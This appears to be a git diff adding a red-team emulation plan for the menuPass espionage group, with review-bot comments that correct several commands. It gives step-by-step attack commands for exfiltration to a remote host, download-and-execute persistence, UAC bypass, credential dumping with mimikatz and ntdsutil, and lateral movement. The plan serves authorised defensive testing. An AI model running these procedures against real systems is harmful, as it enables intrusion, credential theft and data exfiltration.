+#{rar_local_path}\rar.exe a -hp #{password} #{rar_archive_name} #{rar_files}
+```
+
+menuPass Example:
+
+```cmd
+t.vbs r.exe a -hp CVNXPassword aa.rar rar_files
+```
+
+### Alternative Procedures
+
+In the event that WinRAR is unavailable, the following procedures can be used to create archives. Please note that the suggested procedures are not identical to those reported to have been used by menuPass actors and will not result in rar archives. They will however, compress the files for exfiltration using software that is freely available to Windows users.
+
+#### Alternative Procedure 1 - Tar
+
+The following procedure is freely available on Windows 10, build 17063 and later.
+
+```cmd
+tar.exe -a -c -f #{archive_filename} #{files_to_archive}
+```
+
+menuPass Example:
+
+```cmd
+tar.exe -a -c -f aa.zip exfil.txt
+```
+
+#### Alternative Procedure 2 - PowerShell
+
+```cmd
+powershell.exe
+Compress-Archive #{files_to_archive} #{archive_filename}
+```
+
+menuPass Example:
+
+```cmd
+powershell.exe
+Compress-Archive exfil.txt aa.zip
+```
+
+#### 6.B - Local Data Staging ([T1074.001](https:/attack.mitre.org/techniques/T1074/001/))
+
+menuPass actors are thought to have staged archives in the Recycle Bin for exfiltration.[4](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf)
+
+```cmd
+copy #{file_name} C:\$Recycle.Bin\
+```
+
+menuPass Example:
+
+```cmd
+C:\Users\CVNX copy aa.rar C:\$Recycle.Bin
+```
+
+---
+
+## Step 7 - menuPass Exfiltration
+
+### Procedures
+
+#### 7.A - Transfer Data to Cloud Account ([T1537](https://attack.mitre.org/techniques/T1537/))
+
+menuPass is reported to have used the PSCP client, renamed to rundll32.exe to exfiltrate data.[7](https://pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf)
+
+```cmd
+"#{pscp_local_path}"\pscp.exe "#{pscp_exfil_files}" "#{pscp_user}"@"#{pscp_server}":/"#{pscp_drop_location}"
+```
+
+menuPass Example:
+
+```cmd
+rundll32.exe aa.rar CVNX@192.0.2.10:/temp/loot
+```
+
+#### Alternative Procedures
+
+#### cURL
+
+menuPass actors are reported to have used cURL to exfiltrate data to a cloud based storage provider.[10](https://recordedfuture.com/apt10-cyberespionage-campaign/)
+
+```cmd
+"#{curl_local_path}"\curl.exe -X POST -d #{file} #{exfiltration server}
+```
+menuPass Example:
+```cmd
+CU.exe -X POST -d aa.rar CVNX@192.0.2.10:/temp/loot
+```
+---
+
+## Step 8 - menuPass Execution (Optional)
+
+### Procedures
+
+#### 8.A - Windows Management Instrumentation ([T1047](https://attack.mitre.org/techniques/T1047))
+
+menuPass used a customized version of wmiexec to run tools and dump credentials. These files are reported to have been dropped to C:\Recovery, C:\Intel, and C:\PerfLogs. [7](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf)
+
+For the purpose of this plan, if you choose to assume compromise, we recommend using wmiexec to run whatever tactical implant you will be using.
+
+```cmd
+cscript.exe "#{wmiexec_local_path}"\wmiexec.vbs /shell "#{wmiexec_remote_host}"
+```
+
+Example:
+
+```cmd
+cscript.exe C:\Windows\Temp\wmiexec.vbs /shell 192.0.2.10
+```
+
+### Alternative Procedure
+
+#### Scheduled Task using Task Scheduler ([T1053.005](https://attack.mitre.org/techniques/T1053/005))
+
+menuPass has used atexec.py, compiled to atexec.exe to execute commands on remote hosts through the Task Scheduler service.[7](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf)
+
+```cmd
+atexec #{domain/username}:#{password}@#{ip address} #{command}
+```
+
+Example:
+
+```cmd
+atexec DOMAIN\Administrator:'badpassword123!'@192.0.2.10 systeminfo
+```
+
+---
+
+## Step 9 - menuPass Persistence (Optional)
+
+menuPass is reported to have been selective in persisting malware. They are thought to have persisted sustained malware to specific systems and taken steps to ensure C2 would blend in with normal network communications.
+
+### Procedures
+
+#### 9.A - Scheduled Task ([T1053.005](https://attack.mitre.org/techniques/T1053/005))
+
+menuPass is reported to have created scheduled tasks to persist PlugX.[4](https://pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf)
+
+```cmd
+schtasks /create /sc #{schtask_schedule} /tn #{schtask_taskname} /tr #{schtask_taskrun} /ru #{schtask_username}
+```
+
+```cmd
+Example: schtasks /create /sc onlogon /tn WinUpdate /ru System /tr "powershell.exe -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://#{payload_server/#{payload}.ps1'})|iex""
+```
+
+### Alternative Procedures
+
+#### Create or Modify System Process - Windows Service ([T1543.003](https://attack.mitre.org/techniques/T1543/003))
+
+menuPass is reported to have persisted a PlugX implant by creating a Windows service.[5](https://fireeye.com/blog/threat-research/2017/04/apt10_menupass_grou.html)
+
+```cmd
+sc create #{CorWrTool} binPath=#{"\"C:\Windows\vss\vixDiskMountServer.exe\"" start=auto displayname="#{Corel Writing Tools Utility}" type=own
+```
+
+#### Boot or Logon Autostart Execution - Registry Run Keys ([T1547.001](https://attack.mitre.org/techniques/T1547/001))
+
+menuPass is reported to have persisted EvilGrab and RedLeaves by creating a run keys.[7](https://pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf)
+
+```cmd
+reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v ctfmon /t REG_SZ /d "c:\users\#{}\#{iechecker.exe}
+
+reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ISeC Croot Readr
+```
+
+---
+
+## Additional Plan Resources
+
+- [Intelligence Summary](/menuPass/Intelligence_Summary.md)
+- [Operations Flow](/menuPass/Operations_Flow.md)
+- [Emulation Plan](/menuPass/Emulation_Plan/README.md)
+ - [Resource Development](/menuPass/Emulation_Plan/ResourceDevelopment.md)
+ - [Infrastructure](/menuPass/Emulation_Plan/Infrastructure.md)
+ - [Scenario 1](/menuPass/Emulation_Plan/Scenario1.md)
+ - [Scenario 2](/menuPass/Emulation_Plan/Scenario2.md)
+ - [YAML](/menuPass/Emulation_Plan/yaml)
+- [Issues](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/issues)
+- [Change Log](/menuPass/CHANGE_LOG.md)
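Review bot: the three persistence examples in this hunk will not run as written because their quoting and placeholders are unbalanced. The schtasks example (`Example: schtasks /create /sc onlogon /tn WinUpdate /ru System /tr "powershell.exe -exec bypass -c "(New-Object ...`) carries the literal `Example:` prefix inside the fence, leaves the `#{payload_server/#{payload}.ps1'}` placeholder unclosed, and nests unescaped double quotes inside `/tr "..."`, which cmd.exe will terminate at the first inner quote; move `Example:` above the fence, close the placeholder as `#{payload_server}/#{payload}.ps1`, and escape the inner quotes as `\"` or switch the PowerShell string to single quotes. The service example (`sc create #{CorWrTool} binPath=#{"\"C:\Windows\vss\vixDiskMountServer.exe\"" start=auto ...`) wraps the literal values in `#{` with no closing brace and omits the space that sc.exe requires after each `option=`; it should read `sc create CorWrTool binPath= "C:\Windows\vss\vixDiskMountServer.exe" start= auto displayname= "Corel Writing Tools Utility" type= own`. The two reg lines have an opening quote on the key path that is never closed, an empty `#{}` placeholder, and a second command (`reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ISeC Croot Readr`) with no `/v` or `/d`, which would create a subkey under Run rather than a run value, and the unquoted space splits the path; each should be a complete `reg add "HKCU\...\Run" /v <name> /t REG_SZ /d "<path>"`. Smaller points: the atexec example uses `DOMAIN\Administrator` while the template line uses `domain/username` (Impacket expects the forward slash), cmd.exe does not strip the single quotes around the password so they become part of it, and "creating a run keys" should be "creating run keys".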
diff --git a/menuPass/Emulation_Plan/Scenario2.md b/menuPass/Emulation_Plan/Scenario2.md
new file mode 100644
index 00000000..79f4ecac
--- /dev/null
+++ b/menuPass/Emulation_Plan/Scenario2.md
@@ -0,0 +1,308 @@
+# Preface
+Scenario 2 is designed to emulate activity attributed to menuPass that entails the pursuit of tactical objectives using a command-and-control framework with the operational intent of data exfiltration. Initial access could be achieved with either spearphishing or an assumed breach in which the emulation team is granted access to a host. The scenario will begin when execution is achieved, and command and control is established. This scenario differs from Scenario 1 in that instead of uploading an operational toolkit to the victim environment, it employs tactical and sustained malware to execute the subsequent procedures. In emulating this scenario, you will be assessing your organization's ability to protect, detect, and defend execution, command and control, lateral movement, persistence, and exfiltration.
+
+# Scenario 2 Overview
+
+* Emulating menuPass using tools like Koadic C3 and QuasarRat.
+* Scenario 2 begins after a host is compromised, tactical malware has been deployed, and C2 is established.
+* Your objectives in Phase 2 are to conduct discovery, escalate privileges, harvest credentials, move laterally, choose specific systems to persist sustained malware (optional), collect, stage, and exfiltrate real or simulated data.
+
+There are many alternatives to the procedures detailed in this scenario. What is most important is that these procedures have been accomplished, not necessarily how they have been accomplished. If you lack the resources to complete this scenario procedure-by-procedure, feel free to "white card" or simulate where necessary.
+
+## Prerequisites
+
+* You have either ownership of, or explicit authority and/or authorization to operate against the target network.
+* You have established your operational infrastructure.
+* You have selected and installed your tactical implant/command-and-control framework.
+* If you intend to deploy and persist sustained malware, you have identified and compiled your implant.
+
+## Contents
+
+* [Step 1 - Initial Access](#step-1---menupass-initial-access)
+* [Step 2 - Execution](#step-2---menupass-execution)
+* [Step 3 - Discovery](#step-3---menupass-discovery)
+* [Step 4 - Privilege Escalation](#step-4---menupass-privilege-escalation)
+* [Step 5 - Credential Access](#step-5---menupass-credential-access)
+* [Step 6 - Lateral Movement](#step-6---menupass-lateral-movement)
+* [Step 7 - Exfiltration](#step-7---menupass-exfiltration)
+* [Step 8 - Command and Control](#step-8---menupass-command-and-control)
+* [Step 9 - Persistence](#step-9---menupass-persistence)
+
+---
+
+## Step 1 - menuPass Initial Access
+
+### Procedures
+
+#### Phishing ([T1566.001](https://attack.mitre.org/techniques/T1566/001), [T1566.002](https://attack.mitre.org/techniques/T1566/002))
+
+Aside from trusted relationship abuse, menuPass is perhaps best known for efforts to achieve initial access to target networks by deploying phishing emails. These phishing emails deployed tactical malware by one of the four previously discussed methods (macro, .lnk, exploit, masquerading). menuPass has leveraged this initial access to conduct discovery, pursue credential access, and identify systems of interest on which to deploy and persist sustained malware.
+
+## Step 2 - menuPass Execution
+
+### Procedures
+
+#### 2.A - User Execution: Malicious File ([T1204.002](https://attack.mitre.org/techniques/T1204/002/))
+
+menuPass is reported to have employed LNK files to achieve user execution. These LNK files utilized scripting languages to invoke the Windows command line, download and execute tactical implants.[16](https://trendmicro.com/en_us/research/18/c/chessmaster-adds-updated-tools-to-its-arsenal.html)
+
+MSHTA was used to accomplish execution and situate the tactical implant, Koadic, in memory. This tactical implant was used to conduct discovery, credential access, lateral movement.
+
+Attacker
+
+```cmd
+./koadic
+koadic: use stager/js/mshta
+(koadic: sta/js/mshta)# set SRVHOST #{ip_address}
+(koadic: sta/js/mshta)# set SRVPORT #{listening_port}
+(koadic: sta/js/mshta)# run
+[>] mshta http://#{ip_address/#{file_name}
+```
+
+Target
+
+```cmd
+C:\Users\Victim> mshta http://{#ip_address}/#{file_name}
+```
+
+#### 2.B (Optional)
+
+In some instances, soon after establishing C2, menuPass is reported to have introduced an additional implant to enhance operational capabilities.[15](http://blog.trendmicro.com/trendlabs-security-intelligence/chessmasters-new-strategy-evolving-tools-tactics/) [16](https://trendmicro.com/en_us/research/18/c/chessmaster-adds-updated-tools-to-its-arsenal.html) They did so by using Koadic to inject arbitrary shellcode into a process. Excel must be present on the host to use this procedure.
+
+```cmd
+(koadic: sta/js/mshta)# use implant/inject/shellcode_excel
+(koadic: implant/inj/shellcode_excel)# set shellcode #{ASCIIhex_shellcode}
+(koadic: implant/inj/shellcode_excel)# set zombie #{zombie_id}
+(koadic: implant/inj/shellcode_excel)# run
+```
+## Step 3 - menuPass Discovery
+
+After achieving initial execution, menuPass actors are reported to have performed cursory situational awareness checks. These checks are intended to determine suitability for implantation with a sustained implant.[16](https://trendmicro.com/en_us/research/18/c/chessmaster-adds-updated-tools-to-its-arsenal.html)
+
+### Procedures
+
+#### 3.A - System Network Configuration Discovery ([T1016](https://attack.mitre.org/techniques/T1016/)), System Network Connections Discovery ([T1049](https://attack.mitre.org/techniques/T1049/)) [16](https://trendmicro.com/en_us/research/18/c/chessmaster-adds-updated-tools-to-its-arsenal.html)
+
+Attacker
+
+```cmd
+(koadic: sta/js/mshta)# zombies
+(koadic: sta/js/mshta)# cmdshell #{zombie_id}
+C:\Users\Victim> ipconfig /all
+C:\Users\Victim> tasklist /v
+C:\Users\Victim> net view
+C:\Users\Victim> netstat -ano
+```
+
+#### 3.B
+
+```cmd
+(koadic: sta/js/mshta)# use implant/scan/tcp
+(koadic: imp/sca/tcp)# set rhosts #{remote_hosts}
+(koadic: imp/sca/tcp)# set rports #{ports_to_scan}
+(koadic: imp/sca/tcp)# set zombies #{zombie_id}
+(koadic: imp/sca/tcp)# run
+```
+
+## Step 4 - menuPass Privilege Escalation
+
+In Scenario 1, menuPass is presumed to have initially accessed the target environment using compromised credentials that granted elevated privileges. As such, privilege escalation was not necessary. menuPass is reported to have sought access to additional credentials to ensure freedom of movement throughout the domain. This elevated access was a result of the method of initial access.
+
+Scenario 2 differs in this regard as the initial method of access is presumed to be phishing. Phishing does not always result in elevated access. As such, elevation to increase process integrity is required to use the tools that grant additional credential access. As such, we suggest either "white carding" Administrative access or leveraging Koadic's "elevate" modules to attempt escalation.
+
+#### 4.A
+
+```cmd
+(koadic: sta/js/mshta)# use implant/elevate/bypassuac_eventvwr
+(koadic: implant/ele/bypassuac_eventvwr)# set payload #{payload_id}
+(koadic: implant/ele/bypassuac_eventvwr)# set zombie #{zombie_id}
+(koadic: implant/ele/bypassuac_eventvwr)# run
+```
+
+Check Privileges
+
+```cmd
+(koadic: implant/ele/bypassuac_eventvwr)# zombies #{zombie_id}
+```
+
+## Step 5 - menuPass Credential Access
+
+#### 5.A
+
+```cmd
+(koadic: sta/js/mshta)# use implant/inject/mimikatz_dotnet2js
+(koadic: imp/inj/mimikatz_dotnet2js)# set mimicmd #{mimikatz_command}
+(koadic: imp/inj/mimikatz_dotnet2js)# set zombie #{zombie_id}
+```
+
+#### 5.B - OS Credential Dumping: NTDS ([T1003.003](https://attack.mitre.org/techniques/T1003/003/))
+
+menuPass is reported to have sought access to additional credentials to ensure freedom of movement throughout the domain.
+
+```cmd
+(koadic: sta/js/mshta)# use implant/gather/hashdump_dc
+(koadic: imp/gat/hashdump_dc)# set lpath #{local_file_path}
+(koadic: imp/gat/hashdump_dc)# set drive #{drive_to_shadow_copy}
+(koadic: imp/gat/hashdump_dc)# set rpath #{remote_file_save_path}
+(koadic: imp/gat/hashdump_dc)# set certutil true
+(koadic: imp/gat/hashdump_dc)# set zombie #{zombie_id}
+(koadic: imp/gat/hashdump_dc)# run
+```
+
+### Alternative Procedure
+
+### Ntdsutil[32](https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/cicada-apt10-japan-espionage)
+
+This procedure leverages a tool commonly featured on Windows Server, ntdsutil.exe, to dump the SYSTEM AND SECURITY registry hives from the domain controller. These files will be copied to a specified directory and must be egressed from the network in order to dump credentials locally. This procedure requires Administrative privileges and access to the domain controller but does not require credentials.
+
+Ntdsutil.exe must be present on the host.
+
+```cmd
+(koadic: sta/js/mshta)# cmdshell #{zombie_id}
+C:\Users\Victim> powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full C:\ProgramData\Temp' q q"
+```
+
+Download the file
+
+```cmd
+(koadic: sta/js/mshta)# use implant/utils/download_file
+(koadic: imp/uti/download_file)# set lpath #{local_file_save_path}
+(koadic: imp/uti/download_file)# set rfile #{file_to_download}
+(koadic: imp/uti/download_file)# set certutil true
+(koadic: imp/uti/download_file)# set zombie #{zombie_id}
+(koadic: imp/uti/download_file)# run
+```
+
+#### Dumping Credentials Locally
+After copying and exfiltrating the NTDS.dit file, you will use Impacket's secretsdump to dump credentials locally.
+
+```cmd
+secretsdump.exe -system #{system_hive_local_path\SYSTEM} -security #{security_hive_local_path\SECURITY} -ntds #{ntds_local_path\ntds.dit} local
+```
+
+## Step 6 - menuPass Lateral Movement
+
+#### 6.A - Windows Management Instrumentation ([T1047](https://attack.mitre.org/T1047/))
+
+```cmd
+(koadic: sta/js/mshta)# use implant/pivot/stage_wmi
+(koadic: implant/piv/stage_wmi)# set rhost #{remote_host}
+(koadic: implant/piv/stage_wmi)# set smbuser #{user_name}
+(koadic: implant/piv/stage_wmi)# set smbpass #{password}
+(koadic: implant/piv/stage_wmi)# set smbdomain #{domain}
+(koadic: implant/piv/stage_wmi)# set payload #{payload_id}
+(koadic: implant/piv/stage_wmi)# set zombie #{zombie_id}
+(koadic: implant/piv/stage_wmi)# run
+
+```
+
+#### Alternative Procedure
+
+### System Services: Service Execution ([T1569.002](https://attack.mitre.org/techniques/T1569/002))
+
+Upload PsExec to the host
+
+```cmd
+(koadic: sta/js/mshta)# use implant/utils/upload_file
+(koadic: imp/uti/upload_file)# set lfile #{local_file_to_upload}
+(koadic: imp/uti/upload_file)# set zombie #{zombie_id}
+(koadic: imp/uti/upload_file)# run
+```
+
+PsExec to remote host
+
+```cmd
+(koadic: sta/js/mshta)# use implant/pivot/exec_psexec
+(koadic: implant/piv/exec-psexec)# set cmd #{command_to_run}
+(koadic: implant/piv/exec-psexec)# set rhost #{remote_host}
+(koadic: implant/piv/exec-psexec)# set smbuser #{user_name}
+(koadic: implant/piv/exec-psexec)# set smbpass #{password}
+(koadic: implant/piv/exec-psexec)# set credid #{credential_ip}
+(koadic: implant/piv/exec-psexec)# set rpath #{remote_path_to_psexec}
+(koadic: implant/piv/exec-psexec)# set zombie #{zombie_id}
+(koadic: implant/piv/exec-psexec)# run
+```
+
+## Step 7 - menuPass Exfiltration
+
+#### 7.A - Exfiltration Over C2 Channel ([T1041](https://attack.mitre.org/techniques/T1041/))
+
+```cmd
+(koadic: sta/js/mshta)# use implant/utils/download_file
+(koadic: imp/uti/download_file)# set lpath #{local_file_save_path}
+(koadic: imp/uti/download_file)# set rfile #{file_to_download}
+(koadic: imp/uti/download_file)# set certutil true
+(koadic: imp/uti/download_file)# set zombie #{zombie_id}
+(koadic: imp/uti/download_file)# run
+```
+
+## Step 8 - menuPass Command and Control
+
+menuPass actors are reported to have introduced sustained malware to target networks. Poison Ivy, PlugX, and more recently, the publicly available QuasarRat are reported to have been used by menuPass actors.[4](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf) [11](https://blog.trendmicro.com/trendlabs-security-intelligence/chessmaster-cyber-espionage-campaign/) [13](https://blogs.blackberry.com/en/2019/06/threat-spotlight-menupass-quasarrat-backdoor) [25](https://fortinet.com/blog/threat-research/uncovering-new-activity-by-apt-) These implants provide the attacker with additional capabilities. More importantly, these implants are used to ensure persistent access to the target network.
+
+menuPass actors are reported to have conducted ingress tool transfer using several different techniques. You may choose to use Koadic's built-in functionality or leverage tools native to the Windows environment. menuPass actors are reported to have done both.[15](http://blog.trendmicro.com/trendlabs-security-intelligence/chessmasters-new-strategy-evolving-tools-tactics/) [16](https://trendmicro.com/en_us/research/18/c/chessmaster-adds-updated-tools-to-its-arsenal.html)
+
+### Procedures
+
+#### 8.A - Ingress Tool Transfer ([T1105](https://attack.mitre.org/techniques/T1105/))
+
+menuPass may have accessed the command-line to use a tool native to the Windows environment (certutil) to download and decode additional capabilities.[16](https://trendmicro.com/en_us/research/18/c/chessmaster-adds-updated-tools-to-its-arsenal.html)
+
+```cmd
+(koadic: sta/js/mshta)# cmdshell #{zombie_id}
+C:\Users\Victim> certutil.exe -urlcache -split -f https://www.#{payload_server.com}/#{file}
+```
+
+#### Alternative Procedure - Koadic File Upload
+
+```cmd
+(koadic: sta/js/mshta)# use implant/utils/upload_file
+(koadic: imp/uti/upload_file)# set lfile #{local_file_to_upload}
+(koadic: imp/uti/upload_file)# set zombie #{zombie_id}
+(koadic: imp/uti/upload_file)# run
+```
+
+## Step 9 - menuPass Persistence
+
+menuPass actors are reported to have persisted both tactical and sustained malware.[4](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf) [5](https://www.fireeye.com/blog/threat-research/2017/04/apt10_menupass_grou.html) [11](https://blog.trendmicro.com/trendlabs-security-intelligence/chessmaster-cyber-espionage-campaign/) [25](https://fortinet.com/blog/threat-research/uncovering-new-activity-by-apt-) Tactical malware should be thought of as the "work horse." It is the tool used to accomplish tactical objectives and is therefore, more likely to be detected. menuPass is reported to have been deliberate in the deployment and persistence of sustained malware. These implants were employed to facilitate long-term access to target environments.[11](https://blog.trendmicro.com/trendlabs-security-intelligence/chessmaster-cyber-espionage-campaign/) Sustained malware was deployed to systems that afforded the ability to blend in, remain undetected, or facilitate access to a resource deemed essential. Select your host for persistence carefully, and do not persist tactical and sustained implants on the same host.
+
+#### 9.A - Boot or Logon Autostart Execution: Registry Run Keys/Starup Folder ([T1547.001](https://attack.mitre.org/techniques/T1547/001/))
+
+Tactical Malware
+
+```cmd
+(koadic: sta/js/mshta)# use implant/persist/registry
+(koadic: imp/per/registry)# set payload #{payload_id}
+(koadic: imp/per/registry)# set zombie #{zombie_id}
+(koadic: imp/per/registry)# run
+```
+
+#### Alternative Procedure: Scheduled Task/Job: Scheduled Task ([T1053.005](https://attack.mitre.org/techniques/T1053/005))
+
+Tactical Malware
+
+```cmd
+(koadic: sta/js/mshta)# use implant/persist/schtasks
+(koadic: imp/per/schtasks)# set payload #{payload_id}
+(koadic: imp/per/schtasks)# set zombie #{zombie_id}
+(koadic: imp/per/schtasks)# run
+```
+
+Sustained Malware
+
+menuPass actors are reported to have persisted implants using several different procedures to include, creating scheduled tasks, registry keys, Windows services, and dropping LNK files in the Startup folder.[4](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf) [5](https://www.fireeye.com/blog/threat-research/2017/04/apt10_menupass_grou.html) [11](https://blog.trendmicro.com/trendlabs-security-intelligence/chessmaster-cyber-espionage-campaign/) [25](https://fortinet.com/blog/threat-research/uncovering-new-activity-by-apt-) If you choose to use QuasarRAT as your sustained implant, may either select "Run Client when the computer starts" from the Client Builder menu when generating your implant or do so using the Windows command line. QuasarRAT creates a registry run key and schedules a task in order to establish persistence.
+
+---
+
+## Additional Plan Resources
+
+- [Intelligence Summary](/menuPass/Intelligence_Summary.md)
+- [Operations Flow](/menuPass/Operations_Flow.md)
+- [Emulation Plan](/menuPass/Emulation_Plan/README.md)
+ - [Resource Development](/menuPass/Emulation_Plan/ResourceDevelopment.md)
+ - [Infrastructure](/menuPass/Emulation_Plan/Infrastructure.md)
+ - [Scenario 1](/menuPass/Emulation_Plan/Scenario1.md)
+ - [Scenario 2](/menuPass/Emulation_Plan/Scenario2.md)
+ - [YAML](/menuPass/Emulation_Plan/yaml)
+- [Issues](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/issues)
+- [Change Log](/menuPass/CHANGE_LOG.md)
\ No newline at end of file
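Review bot: two of the Scenario 2 procedures are incomplete in ways that stop an operator mid-step. The mimikatz block in 5.A sets `mimicmd` and `zombie` but never issues `run`, so nothing executes; add `(koadic: imp/inj/mimikatz_dotnet2js)# run` as its last line, matching every other Koadic block in the file. The ntdsutil alternative says it dumps the `SYSTEM AND SECURITY registry hives`, then says the operator has exfiltrated `the NTDS.dit file`, and the secretsdump line needs all three (`-system`, `-security`, `-ntds`), but the download step fetches a single `rfile`; state that `ifm create full` writes `Active Directory\ntds.dit` plus `registry\SYSTEM` and `registry\SECURITY` under the target directory, and that the download module has to be run once per file (or the directory archived first). Also: the T1047 link in 6.A (`https://attack.mitre.org/T1047/`) is missing the `/techniques/` path segment; the mshta stager lines have mismatched placeholders (`http://#{ip_address/#{file_name}` and `http://{#ip_address}/#{file_name}`); `set credid #{credential_ip}` in the PsExec block looks like it should be a credential id; the `[25]` Fortinet reference URL is cut off at `uncovering-new-activity-by-apt-` in three places; the Alternative Procedure headings have inverted levels (`####` above `###`); "Starup Folder", "Phase 2" in the overview (the rest of the file says Scenario 2), and "may either select" (missing "you") need fixing; and the file lacks a trailing newline.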
diff --git a/menuPass/Emulation_Plan/yaml/README.md b/menuPass/Emulation_Plan/yaml/README.md
new file mode 100644
index 00000000..139b1677
--- /dev/null
+++ b/menuPass/Emulation_Plan/yaml/README.md
@@ -0,0 +1,26 @@
+# Machine-Readable menuPass Emulation Plans
+
+The universal, technology-agnostic version of the menuPass emulation plan YAML has been provided as starting point for machine readibility of the menuPass emulation plan. This folder will store all versions of this yaml file, including those formatted to work with specific execution runners (such as automated agents like [CALDERA](https://github.com/mitre/caldera) or other breach simulation frameworks).
+
+## Included Formats
+
+As new files are added, please list them in the below table.
+
+| File | Execution Framework | Notes |
+| --- | --- | --- |
+| [menuPass.yaml](/menuPass/Emulation_Plan/yaml/menuPass.yaml) | N/A | Initial Emulation Plan YAML |
+
+---
+
+## Additional Plan Resources
+
+- [Intelligence Summary](/menuPass/Intelligence_Summary.md)
+- [Operations Flow](/menuPass/Operations_Flow.md)
+- [Emulation Plan](/menuPass/Emulation_Plan/README.md)
+ - [Resource Development](/menuPass/Emulation_Plan/ResourceDevelopment.md)
+ - [Infrastructure](/menuPass/Emulation_Plan/Infrastructure.md)
+ - [Scenario 1](/menuPass/Emulation_Plan/Scenario1.md)
+ - [Scenario 2](/menuPass/Emulation_Plan/Scenario2.md)
+ - [YAML](/menuPass/Emulation_Plan/yaml)
+- [Issues](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/issues)
+- [Change Log](/menuPass/CHANGE_LOG.md)
\ No newline at end of file
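Review bot: the table link `[menuPass.yaml](/menuPass/Emulation_Plan/yaml/menuPass.yaml)` points at a capitalised file name, but the file added in this change is `menuPass/Emulation_Plan/yaml/menupass.yaml` (see the next file header); repository paths are case-sensitive, so the link will 404. Rename one side to match, following whatever naming the other plans' YAML files use. Also "readibility" should be "readability", "as starting point" should be "as a starting point", and the file is missing a trailing newline.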
diff --git a/menuPass/Emulation_Plan/yaml/menupass.yaml b/menuPass/Emulation_Plan/yaml/menupass.yaml
new file mode 100644
index 00000000..30fc9936
--- /dev/null
+++ b/menuPass/Emulation_Plan/yaml/menupass.yaml
@@ -0,0 +1,712 @@
+# menuPass.yaml - CALDERA and Atomic Style TTPs
+
+- emulation_plan_details:
+ id: b5192070-dff1-4134-bf66-c6b87c7498af
+ adversary_name: menuPass
+ adversary_description: menuPass is thought to be a Chinese cyber espionage group associated with activity directed by elements of the PRC MSS.
+ attack_version: 8.1
+ format_version: 1.0
+
+# Scenario 1, Step 2 - Command and Control
+
+- id: a750b196-8168-461a-8747-bdc4add107ac
+ name: Ingress Tool Transfer
+ description: Pushing tools to compromised host
+ tactic: discovery
+ technique:
+ attack_id: T1105
+ name: "Ingress Tool Transfer"
+ cti_source: https://recordedfuture.com/apt10-cyberespionage-campaign/
+ procedure_group: procedure_command_and_control
+ procedure_step: "2.A"
+ platforms:
+ windows:
+ psh:
+ command: |
+ Start-BitsTransfer -Source "http://#{bitsadmin_remote_ip}/#{bitsadmin_b64_encoded_string}" -Destination "C:\ProgramData\temp\#{bitsadmin_b64_encoded_string}"
+
+ input_arguments:
+ bitsadmin_remote_ip:
+ description: IP or hostname for remote connection
+ type: String
+ default: |
+ remote-host
+
+ bitsadmin_b64_encoded_string:
+ description: Sample Base 64 Encoded String
+ type: String
+ default: |
+ TWUEGJDITXAONVPUOWFV
+
+ executors:
+ - name: powershell
+ command: |
+ Start-BitsTransfer -Source "http://#{bitsadmin_remote_ip}/#{bitsadmin_b64_encoded_string}" -Destination "C:\ProgramData\temp\#{bitsadmin_b64_encoded_string}"
+
+# Scenario 1, Step 3: Discovery
+
+- id: 7877ec4d-3c11-40f2-9650-35261e4ac879
+ name: Network Share Discovery
+ description: Display network shares
+ tactic: discovery
+ technique:
+ attack_id: T1135
+ name: "Network Share Discovery"
+ cti_source: https://pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf
+ procedure_group: procedure_discovery
+ procedure_step: "3.A"
+ platforms:
+ windows:
+ cmd:
+ command: |
+ net use
+
+ executors:
+ - name: command_prompt
+ command: |
+ net use
+
+- id: e132a235-fe43-45c2-a334-2f235a7646b5
+ name: Remote System Discovery
+ description: Identify remote systems using net
+ tactic: discovery
+ technique:
+ attack_id: T1018
+ name: "Remote System Discovery"
+ cti_source: https://pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf
+ procedure_group: procedure_discovery
+ procedure_step: "3.B"
+ platforms:
+ windows:
+ cmd:
+ command: |
+ net view /domain
+
+ executors:
+ - name: command_prompt
+ command: |
+ net view /domain
+
+- id: d19678ac-3bca-475e-89d4-f452bfc2cc2a
+ name: Remote System Discovery
+ description: Identify remote system using Powershell
+ tactic: discovery
+ technique:
+ attack_id: T1018
+ name: "Remote System Discovery"
+ cti_source: https://pwc.co.uk/cyber-security/pdf/cloud-hopper-anex-b-final.pdf
+ procedure_group: procedure_discovery
+ procedure_step: "3.C"
+ platforms:
+ windows:
+ psh:
+ command: |
+ Test-NetConnection "#{host_address}"
+
+ input_arguments:
+ host_address:
+ description: IP for host discovery
+ type: String
+ default: |
+ 192.0.2.10
+
+ executors:
+ - name: powershell
+ command: |
+ Test-NetConnection "#{host_address}"
+
+- id: b6026408-c815-47ca-bbb0-6b74591badc8
+ name: Network Service Scanning
+ description: Enumerate remote hosts for running services using tcping
+ tactic: discovery
+ technique:
+ attack_id: T1046
+ name: "Network Service Scanning"
+ cti_source: https://pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf
+ procedure_group: procedure_discovery
+ procedure_step: "3.D"
+ platforms:
+ windows:
+ cmd:
+ command: |
+ "#{tcping_local_path}\tcping.exe" "#{tcping_remote_ip}" "#{tcping_remote_port}"
+ payloads:
+ - tcping.exe
+
+ input_arguments:
+ tcping_local_path:
+ description: Path of tcping.exe
+ type: Path
+ default: |
+ C:\Windows\Temp
+
+ tcping_url:
+ description: Path to download tcping.exe
